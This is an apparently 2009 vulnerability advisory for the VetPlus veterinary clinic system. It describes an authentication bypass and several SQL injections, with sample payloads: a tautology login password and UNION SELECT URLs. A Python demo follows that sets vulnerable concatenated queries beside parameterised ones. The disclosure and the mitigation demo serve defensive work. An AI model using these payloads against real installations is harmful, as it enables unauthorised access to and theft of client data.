VetPlus <= 2.0.3 Multiple Remote Vulnerabilities

Name              VetPlus
Vendor            http://sourceforge.net/projects/vet/
Versions Affected <= 2.0.3
Author            Salvatore Fresta aka Drosophila
Website           http://www.salvatorefresta.net
Contact           salvatorefresta [at] gmail [dot] com
Date              2009-12-16

X. INDEX

I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX

I. ABOUT THE APPLICATION

VetPlus is a vet clinics system. It currently manages Clients, Patients and users, and schedules appointments. In v. 1.0.1, auto backup to our servers and Payroll will be added. We're also looking to add Medicine label generators, auto notify and SMS.

II. DESCRIPTION

Many fields are not properly sanitised.

III. ANALYSIS

Summary:

A) Authentication Bypass
B) Multiple SQL Injection

A) Authentication Bypass

The username and password are not properly sanitised. This is the cause of a SQL Injection that allows a guest to bypass the authentication. In order to exploit this vulnerability, the Magic Quotes GPC flag must be Off.

B) Multiple SQL Injection

Many GET parameters are not properly sanitised. This flaw allows a guest to execute arbitrary SQL queries and obtain reserved information stored in the database. In order to exploit this vulnerability, the Magic Quotes GPC flag must be Off.

IV. SAMPLE CODE

A) Authentication Bypass

username: admin
password: 1' OR '1'='1

B) Multiple SQL Injection

http://site/path/viewClientDetailed.php?cl=-AS001' UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16%23

http://site/path/viewPatientDetailed.php?cl=-AS001' UNION SELECT 1,2,3,4,version(),6,7,8,9,10%23&pg=overview#&pg=overview

V. FIX

No Fix.
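The advisory reports no vendor fix, so the following is an added illustration (not VetPlus code, which is not shown here) of why the login bypass in III.A works and how a parameterised query stops it. It assumes a constructed in-memory users table, since the real schema is not given in the advisory; the bypass password is the one from IV.A.

```python
import sqlite3

# Constructed stand-in for the application's users table (assumption: the
# advisory does not give the real VetPlus schema or column names).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return db

def login_concatenated(db, username, password):
    """Vulnerable pattern from the advisory: the submitted fields are spliced
    straight into the SQL text. With magic_quotes_gpc off, the quote in the
    password closes the literal and the trailing OR '1'='1' makes the WHERE
    clause true for every row, so the check passes with no valid credential."""
    sql = ("SELECT COUNT(*) FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    return db.execute(sql).fetchone()[0] > 0

def login_parameterized(db, username, password):
    """Mitigation: bind the values as parameters. The driver sends them as
    data, so the quote and the OR clause are compared literally against the
    stored password and never change the query structure."""
    sql = "SELECT COUNT(*) FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone()[0] > 0

# The sample password from section IV.A of the advisory.
BYPASS_PASSWORD = "1' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("concatenated, bypass payload :", login_concatenated(db, "admin", BYPASS_PASSWORD))
    print("parameterized, bypass payload:", login_parameterized(db, "admin", BYPASS_PASSWORD))
```

The same placeholder binding applies to the cl GET parameter in section III.B; a UNION payload is then just an unmatched string value rather than an appended SELECT.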